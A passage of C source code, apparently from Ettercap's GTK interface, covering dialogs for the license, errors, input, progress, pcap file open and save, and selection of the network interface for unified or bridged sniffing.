gtk_scrolled_window_set_shadow_type(GTK_SCROLLED_WINDOW (scroll), GTK_SHADOW_IN); /* load license file */ g_file_get_contents("./LICENSE", &license, &length, &error); if (error != NULL) { /* no debug message */ g_error_free(error); error = NULL; /* 2nd try */ g_file_get_contents(INSTALL_DATADIR "/" PROGRAM "/LICENSE", &license, &length, &error); #ifndef OS_WINDOWS if (error != NULL) { DEBUG_MSG("failed to load license file: %s, try system path ...", error->message); g_error_free(error); error = NULL; /* 3rd try */ g_file_get_contents("/usr/share/common-licenses/GPL-2", &license, &length, &error); } #endif if (error != NULL) { DEBUG_MSG("failed to load license file: %s", error->message); gtkui_error("Failed to load LICENSE file."); g_error_free(error); error = NULL; } } textview = gtk_text_view_new(); gtk_text_view_set_editable(GTK_TEXT_VIEW(textview), FALSE); textbuf = gtk_text_view_get_buffer(GTK_TEXT_VIEW(textview)); if (license && (unicode = gtkui_utf8_validate(license)) != NULL) { gtk_text_buffer_get_end_iter(textbuf, &iter); gtk_text_buffer_insert(textbuf, &iter, unicode, -1); } gtk_container_add(GTK_CONTAINER(scroll), textview); gtk_notebook_append_page(GTK_NOTEBOOK(notebook), scroll, gtk_label_new("License")); content = gtk_dialog_get_content_area(GTK_DIALOG(dialog)); gtk_container_add(GTK_CONTAINER(content), notebook); /* Hitting Enter closes the About dialog */ gtk_widget_grab_focus( gtk_dialog_get_widget_for_response( GTK_DIALOG(dialog), GTK_RESPONSE_CLOSE)); gtk_widget_show_all(GTK_WIDGET(dialog)); gtk_dialog_run(GTK_DIALOG(dialog)); if (authors) g_free(authors); if (license) g_free(license); gtk_widget_destroy(dialog); } /* * print an error */ static void gtkui_error(const char *msg) { GtkWidget *dialog; gchar *unicode = NULL; DEBUG_MSG("gtkui_error: %s", msg); if((unicode = gtkui_utf8_validate((char *)msg)) == NULL) return; dialog = gtk_message_dialog_new(GTK_WINDOW (window), GTK_DIALOG_MODAL, GTK_MESSAGE_ERROR, GTK_BUTTONS_OK, "%s", unicode); gtk_window_set_position(GTK_WINDOW (dialog), GTK_WIN_POS_CENTER_ON_PARENT); /* blocking - displays dialog waits for user to click OK */ gtk_dialog_run(GTK_DIALOG (dialog)); gtk_widget_destroy(dialog); return; } /* * handle a fatal error and exit */ static void gtkui_fatal_error(const char *msg) { /* if the gui is working at this point display the message in a dialog */ if(window) gtkui_error(msg); /* also dump it to console in case ettercap was started in an xterm */ fprintf(stderr, "FATAL ERROR: %s\n\n\n", msg); clean_exit(-1); } /* * get an input from the user */ void gtkui_input(const char *title, char *input, size_t n, void (*callback)(void)) { GtkWidget *dialog, *entry, *label, *hbox, *image, *content_area; dialog = gtk_dialog_new_with_buttons(PROGRAM" Input", GTK_WINDOW (window), GTK_DIALOG_MODAL, GTK_STOCK_CANCEL, GTK_RESPONSE_CANCEL, GTK_STOCK_OK, GTK_RESPONSE_OK, NULL); #if !GTK_CHECK_VERSION(2, 22, 0) // depricated since Gtk 2.22 gtk_dialog_set_has_separator(GTK_DIALOG (dialog), FALSE); #endif gtk_container_set_border_width(GTK_CONTAINER (dialog), 5); hbox = gtkui_box_new(GTK_ORIENTATION_HORIZONTAL, 6, FALSE); content_area = gtk_dialog_get_content_area(GTK_DIALOG(dialog)); gtk_container_add(GTK_CONTAINER(content_area), hbox); image = gtk_image_new_from_stock (GTK_STOCK_DIALOG_QUESTION, GTK_ICON_SIZE_DIALOG); gtk_misc_set_alignment (GTK_MISC (image), 0.5, 0.0); gtk_box_pack_start (GTK_BOX (hbox), image, FALSE, FALSE, 0); label = gtk_label_new (title); gtk_label_set_line_wrap (GTK_LABEL (label), TRUE); gtk_label_set_selectable (GTK_LABEL (label), TRUE); gtk_box_pack_start (GTK_BOX (hbox), label, TRUE, TRUE, 0); entry = gtk_entry_new(); gtk_entry_set_max_length(GTK_ENTRY(entry), n); g_object_set_data(G_OBJECT (entry), "dialog", dialog); g_signal_connect(G_OBJECT (entry), "activate", G_CALLBACK (gtkui_dialog_enter), NULL); if (input) gtk_entry_set_text(GTK_ENTRY (entry), input); gtk_box_pack_start(GTK_BOX (hbox), entry, FALSE, FALSE, 5); gtk_widget_show_all (hbox); if (gtk_dialog_run(GTK_DIALOG(dialog)) == GTK_RESPONSE_OK) { strncpy(input, gtk_entry_get_text(GTK_ENTRY (entry)), n); if (callback != NULL) { gtk_widget_destroy(dialog); callback(); return; } } gtk_widget_destroy(dialog); } /* * show or update the progress bar */ static void gtkui_progress(char *title, int value, int max) { static GtkWidget *hbox, *button; /* the first time, create the object */ if (progress_bar == NULL) { progress_dialog = gtk_window_new(GTK_WINDOW_TOPLEVEL); gtk_window_set_title(GTK_WINDOW (progress_dialog), PROGRAM); gtk_window_set_modal(GTK_WINDOW (progress_dialog), TRUE); gtk_window_set_transient_for(GTK_WINDOW(progress_dialog), GTK_WINDOW(window)); gtk_window_set_position(GTK_WINDOW(progress_dialog), GTK_WIN_POS_CENTER_ON_PARENT); gtk_container_set_border_width(GTK_CONTAINER (progress_dialog), 5); g_signal_connect(G_OBJECT (progress_dialog), "delete_event", G_CALLBACK (gtkui_progress_cancel), NULL); hbox = gtkui_box_new(GTK_ORIENTATION_HORIZONTAL, 3, FALSE); gtk_container_add(GTK_CONTAINER (progress_dialog), hbox); progress_bar = gtk_progress_bar_new(); #if GTK_CHECK_VERSION(3, 0, 0) gtk_progress_bar_set_show_text(GTK_PROGRESS_BAR(progress_bar), TRUE); #endif gtk_box_pack_start(GTK_BOX (hbox), progress_bar, TRUE, TRUE, 0); button = gtk_button_new_from_stock(GTK_STOCK_CANCEL); gtk_box_pack_start(GTK_BOX (hbox), button, FALSE, FALSE, 0); g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_progress_cancel), progress_dialog); } /* the subsequent calls have to only update the object */ gtk_progress_bar_set_text(GTK_PROGRESS_BAR (progress_bar), title); gtk_progress_bar_set_fraction(GTK_PROGRESS_BAR (progress_bar), (gdouble)((gdouble)value / (gdouble)max)); /* update dialog window */ gtk_widget_show_all(progress_dialog); /* * when 100%, destroy it */ if (value == max) { if (progress_dialog) gtk_widget_destroy(progress_dialog); progress_dialog = NULL; progress_bar = NULL; } } static gboolean gtkui_progress_cancel(GtkWidget *window, gpointer data) { /* variable not used */ (void) window; progress_canceled = TRUE; /* the progress dialog must be manually destroyed if the cancel button is used */ if (data != NULL && GTK_IS_WIDGET(data)) { gtk_widget_destroy(data); progress_dialog = NULL; progress_bar = NULL; } return(FALSE); } /* * print a message */ void gtkui_message(const char *msg) { GtkWidget *dialog; DEBUG_MSG("gtkui_message: %s", msg); dialog = gtk_message_dialog_new(GTK_WINDOW (window), GTK_DIALOG_MODAL, GTK_MESSAGE_INFO, GTK_BUTTONS_OK, "%s", msg); gtk_window_set_position(GTK_WINDOW (dialog), GTK_WIN_POS_CENTER_ON_PARENT); /* blocking - displays dialog waits for user to click OK */ gtk_dialog_run(GTK_DIALOG (dialog)); gtk_widget_destroy(dialog); return; } /* * Create the main interface and enter the second loop */ void gtkui_start(void) { guint idle_flush; DEBUG_MSG("gtk_start"); idle_flush = g_timeout_add(500, gtkui_flush_msg, NULL); /* which interface do we have to display ? */ if (EC_GBL_OPTIONS->read) gtkui_sniff_offline(); else gtkui_sniff_live(); /* start plugins defined on CLI */ g_idle_add(gtkui_plugins_autostart, NULL); /* the main gui loop, once this exits the gui will be destroyed */ gtk_main(); g_source_remove(idle_flush); } static void toggle_unoffensive(void) { if (EC_GBL_OPTIONS->unoffensive) { EC_GBL_OPTIONS->unoffensive = 0; } else { EC_GBL_OPTIONS->unoffensive = 1; } } static void toggle_nopromisc(void) { if (EC_GBL_PCAP->promisc) { EC_GBL_PCAP->promisc = 0; } else { EC_GBL_PCAP->promisc = 1; } } /* * display the initial menu to setup global options * at startup. */ static void gtkui_setup(void) { GtkTextIter iter; GtkWidget *vbox, *scroll, *vpaned, *logo, *main_menu; GtkActionGroup *menuactions; GtkAction *action; GClosure *closure = NULL; GError *error = NULL; GdkModifierType mods; gint keyval, width, height, left, top; char *path = NULL; static const char *menu_structure = "" " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " #ifndef OS_WINDOWS " " #endif " " " " " " ""; GtkActionEntry menu_items[] = { /* File Menu */ { "FileMenuAction", NULL, "_File", NULL, NULL, NULL }, { "FileOpenAction", GTK_STOCK_OPEN, "_Open", "O", "Open a PCAP file", G_CALLBACK(gtkui_file_open) }, { "FileSaveAction", GTK_STOCK_SAVE, "_Save", "S", "Save traffic as PCAP file", G_CALLBACK(gtkui_file_write) }, { "FileExitAction", GTK_STOCK_QUIT, "E_xit", "Q", "Exit Ettercap", G_CALLBACK(gtkui_exit) }, /* Sniff Menu */ { "SniffMenuAction", NULL, "_Sniff", NULL, NULL, NULL }, { "SniffUnifiedAction", GTK_STOCK_DND, "Unified sniffing...", "U", "Switch to unified sniffing mode", G_CALLBACK(gtkui_unified_sniff) }, { "SniffBridgedAction", GTK_STOCK_DND_MULTIPLE, "Bridged sniffing...", "B", "Switch to bridged sniffing mode", G_CALLBACK(gtkui_bridged_sniff) }, { "SniffFilterAction", GTK_STOCK_PREFERENCES, "Set pcap filter...", "P", "Limit relevant traffic", G_CALLBACK(gtkui_pcap_filter) }, /* Options Menu */ { "OptionsMenuAction", NULL, "_Options", NULL, NULL, NULL }, { "OptionsNetmaskAction", NULL, "Set netmask", "N", "Override netmask", G_CALLBACK(gtkui_set_netmask) }, /* Help Menu */ { "HelpMenuAction", NULL, "_Info", NULL, NULL, NULL }, #ifndef OS_WINDOWS { "HelpAction", GTK_STOCK_HELP, "Help", "F1", "Ettercap documentation", G_CALLBACK(gtkui_help) }, #endif { "AboutDialogAction", GTK_STOCK_ABOUT, "About", NULL, "About Ettercap", G_CALLBACK(gtkui_about) } }; GtkToggleActionEntry toggle_items[] = { { "OptionsUnoffensiveAction", NULL, "Unoffensive", NULL, "Keep quiet", G_CALLBACK(toggle_unoffensive), FALSE }, { "OptionsPromiscAction", NULL, "Promisc mode", NULL, "Toogle promisc mode (default: on)", G_CALLBACK(toggle_nopromisc), FALSE } }; DEBUG_MSG("gtkui_setup"); width = gtkui_conf_get("window_width"); height = gtkui_conf_get("window_height"); left = gtkui_conf_get("window_left"); top = gtkui_conf_get("window_top"); /* create menu window */ window = gtk_window_new (GTK_WINDOW_TOPLEVEL); gtk_window_set_title(GTK_WINDOW (window), PROGRAM" "EC_VERSION); gtk_window_set_default_size(GTK_WINDOW (window), width, height); /* set window icon */ path = ICON_DIR "/" ICON_FILE; if (g_file_test(path, G_FILE_TEST_EXISTS)) { gtk_window_set_icon(GTK_WINDOW(window), gdk_pixbuf_new_from_file(path, NULL)); } else { /* if neither path is valid gtk will use a broken image icon */ gtk_window_set_icon(GTK_WINDOW(window), gdk_pixbuf_new_from_file("./share/" ICON_FILE, NULL)); } if(left > 0 || top > 0) gtk_window_move(GTK_WINDOW(window), left, top); g_signal_connect (G_OBJECT (window), "delete_event", G_CALLBACK (gtkui_exit), NULL); /* group GtkActions together to one group */ menuactions = gtk_action_group_new("MenuActions"); gtk_action_group_add_actions(menuactions, menu_items, G_N_ELEMENTS(menu_items), NULL); gtk_action_group_add_toggle_actions(menuactions, toggle_items, G_N_ELEMENTS(toggle_items), NULL); /* create a new GtkUIManager instance and assing action group */ menu_manager = gtk_ui_manager_new(); gtk_ui_manager_insert_action_group(menu_manager, menuactions, 0); /* Load the menu structure XML*/ merge_id = gtk_ui_manager_add_ui_from_string(menu_manager, menu_structure, -1, &error); if (error) { g_message("building menu failed: %s", error->message); g_error_free(error); error = NULL; } /* some hidden accelerators */ accel_group = gtk_accel_group_new (); closure = g_cclosure_new(G_CALLBACK(gtkui_unified_sniff_default), NULL, NULL); gtk_accelerator_parse ("u", &keyval, &mods); gtk_accel_group_connect(accel_group, keyval, mods, 0, closure); closure = g_cclosure_new(G_CALLBACK(gtkui_exit), NULL, NULL); gtk_accelerator_parse("X", &keyval, &mods); gtk_accel_group_connect(accel_group, keyval, mods, 0, closure); /* link accelerator groups to window widget */ gtk_window_add_accel_group (GTK_WINDOW (window), accel_group); gtk_window_add_accel_group(GTK_WINDOW(window), gtk_ui_manager_get_accel_group(menu_manager)); vbox = gtkui_box_new(GTK_ORIENTATION_VERTICAL, 0, FALSE); gtk_container_add(GTK_CONTAINER (window), vbox); gtk_widget_show(vbox); main_menu = gtk_ui_manager_get_widget(menu_manager, "/MenuBar"); gtk_box_pack_start(GTK_BOX(vbox), main_menu, FALSE, FALSE, 0); gtk_widget_show(main_menu); if(EC_GBL_PCAP->promisc) { /* setting the menu item active will toggle this setting */ /* it will be TRUE after the menu is updated */ EC_GBL_PCAP->promisc = 0; action = gtk_ui_manager_get_action(menu_manager, "/MenuBar/OptionsMenu/Promisc"); gtk_toggle_action_set_active(GTK_TOGGLE_ACTION(action), TRUE); } if(EC_GBL_OPTIONS->unoffensive) { EC_GBL_OPTIONS->unoffensive = 0; action = gtk_ui_manager_get_action(menu_manager, "/MenuBar/OptionsMenu/Unoffensive"); gtk_toggle_action_set_active(GTK_TOGGLE_ACTION(action), TRUE); } #if GTK_CHECK_VERSION(3, 0, 0) vpaned = gtk_paned_new(GTK_ORIENTATION_VERTICAL); #else vpaned = gtk_vpaned_new(); #endif /* notebook for MDI pages */ notebook_frame = gtk_frame_new(NULL); gtk_frame_set_shadow_type(GTK_FRAME (notebook_frame), GTK_SHADOW_IN); gtk_paned_pack1(GTK_PANED(vpaned), notebook_frame, TRUE, TRUE); gtk_widget_show(notebook_frame); path = INSTALL_DATADIR "/" PROGRAM "/" LOGO_FILE; if(g_file_test(path, G_FILE_TEST_EXISTS)) logo = gtk_image_new_from_file(path); else /* if neither path is valid gtk will use a broken image icon */ logo = gtk_image_new_from_file("./share/" LOGO_FILE); gtk_misc_set_alignment (GTK_MISC (logo), 0.5, 0.5); gtk_container_add(GTK_CONTAINER (notebook_frame), logo); gtk_widget_show(logo); /* messages */ scroll = gtk_scrolled_window_new(NULL, NULL); gtk_scrolled_window_set_policy(GTK_SCROLLED_WINDOW (scroll), GTK_POLICY_AUTOMATIC, GTK_POLICY_ALWAYS); gtk_scrolled_window_set_shadow_type(GTK_SCROLLED_WINDOW (scroll), GTK_SHADOW_IN); gtk_widget_set_size_request(scroll, -1, 140); gtk_paned_pack2(GTK_PANED (vpaned), scroll, FALSE, TRUE); gtk_widget_show(scroll); textview = gtk_text_view_new(); gtk_text_view_set_wrap_mode(GTK_TEXT_VIEW (textview), GTK_WRAP_WORD_CHAR); gtk_text_view_set_editable(GTK_TEXT_VIEW (textview), FALSE); gtk_text_view_set_cursor_visible(GTK_TEXT_VIEW (textview), FALSE); gtk_container_add(GTK_CONTAINER (scroll), textview); gtk_widget_show(textview); msgbuffer = gtk_text_view_get_buffer(GTK_TEXT_VIEW (textview)); gtk_text_buffer_get_end_iter(msgbuffer, &iter); endmark = gtk_text_buffer_create_mark(msgbuffer, "end", &iter, FALSE); gtk_box_pack_end(GTK_BOX(vbox), vpaned, TRUE, TRUE, 0); gtk_widget_show(vpaned); gtk_widget_show(window); DEBUG_MSG("gtk_setup: end"); } /* * display the file open dialog */ static void gtkui_file_open(void) { GtkWidget *dialog; gchar *filename; int response = 0; DEBUG_MSG("gtk_file_open"); dialog = gtk_file_chooser_dialog_new("Select a pcap file...", GTK_WINDOW(window), GTK_FILE_CHOOSER_ACTION_OPEN, GTK_STOCK_CANCEL, GTK_RESPONSE_CANCEL, GTK_STOCK_OPEN, GTK_RESPONSE_OK, NULL); /* This way the file chooser dialog doesn't start in the recent section */ gtk_file_chooser_set_current_folder(GTK_FILE_CHOOSER(dialog), ""); response = gtk_dialog_run (GTK_DIALOG (dialog)); if (response == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); filename = gtk_file_chooser_get_filename(GTK_FILE_CHOOSER(dialog)); /* destroy needs to come before read_pcapfile so gtk_main_quit can reside inside read_pcapfile, which is why destroy is here twice and not after the if() block */ gtk_widget_destroy (dialog); read_pcapfile (filename); g_free(filename); } else { gtk_widget_destroy (dialog); } } static void read_pcapfile(gchar *file) { char pcap_errbuf[PCAP_ERRBUF_SIZE]; DEBUG_MSG("read_pcapfile %s", file); SAFE_CALLOC(EC_GBL_OPTIONS->pcapfile_in, strlen(file)+1, sizeof(char)); snprintf(EC_GBL_OPTIONS->pcapfile_in, strlen(file)+1, "%s", file); /* check if the file is good */ if (is_pcap_file(EC_GBL_OPTIONS->pcapfile_in, pcap_errbuf) != E_SUCCESS) { ui_error("%s", pcap_errbuf); SAFE_FREE(EC_GBL_OPTIONS->pcapfile_in); return; } /* set the options for reading from file */ EC_GBL_OPTIONS->silent = 1; EC_GBL_OPTIONS->unoffensive = 1; EC_GBL_OPTIONS->write = 0; EC_GBL_OPTIONS->read = 1; gtk_main_quit(); } /* * display the write file menu */ static void gtkui_file_write(void) { #define FILE_LEN 40 GtkWidget *dialog; gchar *filename; int response = 0; DEBUG_MSG("gtk_file_write"); dialog = gtk_file_chooser_dialog_new("Save traffic in a pcap file...", GTK_WINDOW(window), GTK_FILE_CHOOSER_ACTION_SAVE, GTK_STOCK_CANCEL, GTK_RESPONSE_CANCEL, GTK_STOCK_OPEN, GTK_RESPONSE_OK, NULL); /* This way the file chooser dialog doesn't start in the recent section */ gtk_file_chooser_set_current_folder(GTK_FILE_CHOOSER(dialog), ""); response = gtk_dialog_run (GTK_DIALOG (dialog)); if (response == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); filename = gtk_file_chooser_get_filename(GTK_FILE_CHOOSER(dialog)); /* destroy needs to come before read_pcapfile so gtk_main_quit can reside inside read_pcapfile, which is why destroy is here twice and not after the if() block */ gtk_widget_destroy (dialog); EC_GBL_OPTIONS->pcapfile_out = filename; write_pcapfile(); } else { gtk_widget_destroy (dialog); } } static void write_pcapfile(void) { FILE *f; DEBUG_MSG("write_pcapfile"); /* check if the file is writeable */ f = fopen(EC_GBL_OPTIONS->pcapfile_out, "w"); if (f == NULL) { ui_error("Cannot write %s", EC_GBL_OPTIONS->pcapfile_out); g_free(EC_GBL_OPTIONS->pcapfile_out); return; } /* if ok, delete it */ fclose(f); unlink(EC_GBL_OPTIONS->pcapfile_out); /* set the options for writing to a file */ EC_GBL_OPTIONS->write = 1; EC_GBL_OPTIONS->read = 0; } /* * display the interface selection dialog */ static void gtkui_unified_sniff(void) { GtkListStore *iface_list; GtkTreeIter iter; GtkTreeModel *model; GtkCellRenderer *cell; const char *iface_desc = NULL; char err[100]; GtkWidget *iface_combo; pcap_if_t *dev; GtkWidget *dialog, *label, *hbox, *vbox, *image, *content_area; DEBUG_MSG("gtk_unified_sniff"); dialog = gtk_dialog_new_with_buttons(PROGRAM" Input", GTK_WINDOW (window), GTK_DIALOG_MODAL, GTK_STOCK_CANCEL, GTK_RESPONSE_CANCEL, GTK_STOCK_OK, GTK_RESPONSE_OK, NULL); #if !GTK_CHECK_VERSION(2, 22, 0) // depricated since Gtk 2.22 gtk_dialog_set_has_separator(GTK_DIALOG (dialog), FALSE); #endif gtk_container_set_border_width(GTK_CONTAINER (dialog), 5); hbox = gtkui_box_new(GTK_ORIENTATION_HORIZONTAL, 6, FALSE); content_area = gtk_dialog_get_content_area(GTK_DIALOG(dialog)); gtk_container_add(GTK_CONTAINER(content_area), hbox); image = gtk_image_new_from_stock (GTK_STOCK_DIALOG_QUESTION, GTK_ICON_SIZE_DIALOG); gtk_misc_set_alignment (GTK_MISC (image), 0.5, 0.0); gtk_box_pack_start (GTK_BOX (hbox), image, FALSE, FALSE, 0); label = gtk_label_new ("Network interface : "); gtk_label_set_line_wrap (GTK_LABEL (label), TRUE); gtk_label_set_selectable (GTK_LABEL (label), TRUE); gtk_box_pack_start (GTK_BOX (hbox), label, TRUE, TRUE, 0); /* make a list of network interfaces */ iface_list = gtk_list_store_new(1, G_TYPE_STRING); for(dev = (pcap_if_t *)EC_GBL_PCAP->ifs; dev != NULL; dev = dev->next) { gtk_list_store_append(iface_list, &iter); gtk_list_store_set(iface_list, &iter, 0, dev->description, -1); } /* make a drop down box and assign the list to it */ iface_combo = gtk_combo_box_new(); gtk_combo_box_set_model(GTK_COMBO_BOX(iface_combo), GTK_TREE_MODEL(iface_list)); g_object_unref(iface_list); cell = gtk_cell_renderer_text_new(); gtk_cell_layout_pack_start(GTK_CELL_LAYOUT(iface_combo), cell, TRUE); gtk_cell_layout_set_attributes( GTK_CELL_LAYOUT( iface_combo ), cell, "text", 0, NULL ); gtk_combo_box_set_active(GTK_COMBO_BOX(iface_combo), 0); vbox = gtkui_box_new(GTK_ORIENTATION_VERTICAL, 0, FALSE); gtk_box_pack_start(GTK_BOX(vbox), iface_combo, TRUE, FALSE, 0); gtk_box_pack_start(GTK_BOX(hbox), vbox, FALSE, FALSE, 0); /* hitting Enter in the drop down box clicks OK */ g_object_set_data(G_OBJECT(GTK_COMBO_BOX(iface_combo)), "dialog", dialog); g_signal_connect(G_OBJECT(GTK_COMBO_BOX(iface_combo)), "key-press-event", G_CALLBACK(gtkui_combo_enter), NULL); /* render the contents of the dialog */ gtk_widget_show_all (hbox); /* show the dialog itself and become interactive */ if (gtk_dialog_run(GTK_DIALOG(dialog)) == GTK_RESPONSE_OK) { gtk_combo_box_get_active_iter(GTK_COMBO_BOX(iface_combo), &iter); model = gtk_combo_box_get_model(GTK_COMBO_BOX(iface_combo)); gtk_tree_model_get(model, &iter, 0, &iface_desc, -1); for(dev = (pcap_if_t *)EC_GBL_PCAP->ifs; dev != NULL; dev = dev->next) { if(!strncmp(dev->description, iface_desc, IFACE_LEN)) { SAFE_FREE(EC_GBL_OPTIONS->iface); SAFE_CALLOC(EC_GBL_OPTIONS->iface, IFACE_LEN, sizeof(char)); strncpy(EC_GBL_OPTIONS->iface, dev->name, IFACE_LEN); break; } } /* if no match in list */ if(EC_GBL_OPTIONS->iface == NULL) { snprintf(err, 100, "Invalid interface: %s", iface_desc); gtkui_error(err); gtk_widget_destroy(dialog); return; } /* exit setup iterface */ gtk_widget_destroy(dialog); gtk_main_quit(); return; } gtk_widget_destroy(dialog); } /* * start unified sniffing with default interface */ static void gtkui_unified_sniff_default(void) { DEBUG_MSG("gtkui_unified_sniff_default"); /* the ec_capture will find the interface for us */ if (EC_GBL_OPTIONS->iface == NULL) { char *iface; SAFE_CALLOC(EC_GBL_OPTIONS->iface, IFACE_LEN, sizeof(char)); iface = capture_default_if(); ON_ERROR(iface, NULL, "No suitable interface found...."); strncpy(EC_GBL_OPTIONS->iface, iface, IFACE_LEN - 1); } /* close setup interface and start sniffing */ gtk_main_quit(); } /* * display the interface selection for bridged sniffing */ static void gtkui_bridged_sniff(void) { GtkWidget *dialog, *vbox, *hbox, *image, *content_area; GtkWidget *hbox_big, *label, *combo1, *combo2; GtkListStore *iface_list; GtkTreeIter iter; GtkTreeModel *model; GtkCellRenderer *cell1, *cell2; const char *iface_desc = NULL; char err[100]; pcap_if_t *dev; DEBUG_MSG("gtk_bridged_sniff"); dialog = gtk_dialog_new_with_buttons("Bridged Sniffing", GTK_WINDOW (window), GTK_DIALOG_MODAL, GTK_STOCK_CANCEL, GTK_RESPONSE_CANCEL, GTK_STOCK_OK, GTK_RESPONSE_OK, NULL); gtk_container_set_border_width(GTK_CONTAINER (dialog), 5); #if !GTK_CHECK_VERSION(2, 22, 0) // depricated since Gtk 2.22 gtk_dialog_set_has_separator(GTK_DIALOG (dialog), FALSE); #endif hbox_big = gtkui_box_new(GTK_ORIENTATION_HORIZONTAL, 5, FALSE); content_area = gtk_dialog_get_content_area(GTK_DIALOG(dialog)); gtk_container_add(GTK_CONTAINER(content_area), hbox_big); vbox = gtkui_box_new(GTK_ORIENTATION_VERTICAL, 0, FALSE); image = gtk_image_new_from_stock (GTK_STOCK_DIALOG_QUESTION, GTK_ICON_SIZE_DIALOG); gtk_misc_set_alignment (GTK_MISC (image), 0.5, 0.1); gtk_box_pack_start (GTK_BOX (vbox), image, TRUE, FALSE, 5); gtk_box_pack_start(GTK_BOX(hbox_big), vbox, FALSE, FALSE, 0); vbox = gtkui_box_new(GTK_ORIENTATION_VERTICAL, 2, FALSE); gtk_container_set_border_width(GTK_CONTAINER (vbox), 5); gtk_box_pack_start (GTK_BOX (hbox_big), vbox, TRUE, TRUE, 0); hbox = gtkui_box_new(GTK_ORIENTATION_HORIZONTAL, 0, FALSE); gtk_box_pack_start(GTK_BOX (vbox), hbox, TRUE, TRUE, 0); label = gtk_label_new ("First network interface : "); gtk_misc_set_alignment(GTK_MISC (label), 0, 0.5); gtk_box_pack_start(GTK_BOX (hbox), label, TRUE, TRUE, 0); hbox = gtkui_box_new(GTK_ORIENTATION_HORIZONTAL, 0, FALSE); gtk_box_pack_start(GTK_BOX (vbox), hbox, TRUE, TRUE, 0); label = gtk_label_new ("Second network interface : "); gtk_misc_set_alignment(GTK_MISC (label), 0, 0.5); gtk_box_pack_start(GTK_BOX (hbox), label, TRUE, TRUE, 0); vbox = gtkui_box_new(GTK_ORIENTATION_VERTICAL, 0, FALSE); gtk_box_pack_start(GTK_BOX(hbox_big), vbox, TRUE, TRUE, 0); /* make a list of network interfaces */ iface_list = gtk_list_store_new(1, G_TYPE_STRING); for(dev = (pcap_if_t *)EC_GBL_PCAP->ifs; dev != NULL; dev = dev->next) { gtk_list_store_append(iface_list, &iter); gtk_list_store_set(iface_list, &iter, 0, dev->description, -1); } /* make a drop down box and assign the list to it */ combo1 = gtk_combo_box_new(); gtk_combo_box_set_model(GTK_COMBO_BOX(combo1), GTK_TREE_MODEL(iface_list)); cell1 = gtk_cell_renderer_text_new(); gtk_cell_layout_pack_start(GTK_CELL_LAYOUT(combo1), cell1, TRUE); gtk_cell_layout_set_attributes(GTK_CELL_LAYOUT(combo1), cell1, "text", 0, NULL); gtk_box_pack_start (GTK_BOX (vbox), combo1, TRUE, FALSE, 0); gtk_combo_box_set_active(GTK_COMBO_BOX(combo1), 0); /* make a drop down box and assign the list to it */ combo2 = gtk_combo_box_new(); gtk_combo_box_set_model(GTK_COMBO_BOX(combo2), GTK_TREE_MODEL(iface_list)); cell2 = gtk_cell_renderer_text_new(); gtk_cell_layout_pack_start(GTK_CELL_LAYOUT(combo2), cell2, TRUE); gtk_cell_layout_set_attributes(GTK_CELL_LAYOUT(combo2), cell2, "text", 0, NULL); gtk_box_pack_start(GTK_BOX(vbox), combo2, TRUE, FALSE, 0); gtk_combo_box_set_active(GTK_COMBO_BOX(combo2), 1); g_object_unref(iface_list); /* hitting Enter in the drop down box clicks OK */ gtk_widget_grab_focus(gtk_dialog_get_widget_for_response(GTK_DIALOG(dialog), GTK_RESPONSE_OK)); gtk_widget_show_all(hbox_big); if (gtk_dialog_run (GTK_DIALOG (dialog)) == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); gtk_combo_box_get_active_iter(GTK_COMBO_BOX(combo1), &iter); model = gtk_combo_box_get_model(GTK_COMBO_BOX(combo1)); gtk_tree_model_get(model, &iter, 0, &iface_desc, -1); for(dev = (pcap_if_t *)EC_GBL_PCAP->ifs; dev != NULL; dev = dev->next) { if(!strncmp(dev->description, iface_desc, IFACE_LEN)) { SAFE_FREE(EC_GBL_OPTIONS->iface); SAFE_CALLOC(EC_GBL_OPTIONS->iface, IFACE_LEN, sizeof(char)); strncpy(EC_GBL_OPTIONS->iface, dev->name, IFACE_LEN); break; } } /* if no match in list */ if(EC_GBL_OPTIONS->iface == NULL) { snprintf(err, 100, "Invalid interface: %s", iface_desc); gtkui_error(err); gtk_widget_destroy(dialog); return; } gtk_combo_box_get_active_iter(GTK_COMBO_BOX(combo2), &iter); model = gtk_combo_box_get_model(GTK_COMBO_BOX(combo2)); gtk_tree_model_get(model, &iter, 0, &iface_desc, -1); for(dev = (pcap_if_t *)EC_GBL_PCAP->ifs; dev != NULL; dev = dev->next) { if(!strncmp(dev->description, iface_desc, IFACE_LEN)) { SAFE_FREE(EC_GBL_OPTIONS->iface_bridge); SAFE_CALLOC(EC_GBL_OPTIONS->iface_bridge, IFACE_LEN, sizeof(char)); strncpy(EC_GBL_OPTIONS->iface_bridge, dev->name, IFACE_LEN); break; } } /* if no match in list */ if(EC_GBL_OPTIONS->iface_bridge == NULL) { snprintf(err, 100, "Invalid interface: %s", iface_desc); gtkui_error(err); gtk_widget_destroy(dialog); return; } bridged_sniff(); } gtk_widget_destroy(dialog); } static void bridged_sniff(void) { set_bridge_sniff(); /* leaves setup menu, goes to main interface */ gtk_main_quit(); } /* * display the pcap filter dialog */ static void gtkui_pcap_filter(void) { #define PCAP_FILTER_LEN 50 DEBUG_MSG("gtk_pcap_filter"); if (EC_GBL_PCAP->filter == NULL) SAFE_CALLOC(EC_GBL_PCAP->filter, PCAP_FILTER_LEN, sizeof(char)); /* * no callback, the filter is set but we have to return to * the interface for other user input */ gtkui_input("Pcap filter :", EC_GBL_PCAP->filter, PCAP_FILTER_LEN, NULL); } /* * set a different netmask than the system one */ static void gtkui_set_netmask(void) { struct ip_addr net; DEBUG_MSG("gtkui_set_netmask"); if (EC_GBL_OPTIONS->netmask == NULL) SAFE_CALLOC(EC_GBL_OPTIONS->netmask, IP_ASCII_ADDR_LEN, sizeof(char)); /* * no callback, the filter is set but we have to return to * the interface for other user input */ gtkui_input("Netmask :", EC_GBL_OPTIONS->netmask, IP_ASCII_ADDR_LEN, NULL); /* sanity check */ if (strcmp(EC_GBL_OPTIONS->netmask, "") && ip_addr_pton(EC_GBL_OPTIONS->netmask, &net) != E_SUCCESS) ui_error("Invalid netmask %s", EC_GBL_OPTIONS->netmask); /* if no netmask was specified, free it */ if (!strcmp(EC_GBL_OPTIONS->netmask, "")) SAFE_FREE(EC_GBL_OPTIONS->netmask); } /* * Callback for g_timeout_add() to resolve a IP to name asyncronously * if the name is not already in the cache, host_iptoa * immediately returns but starts 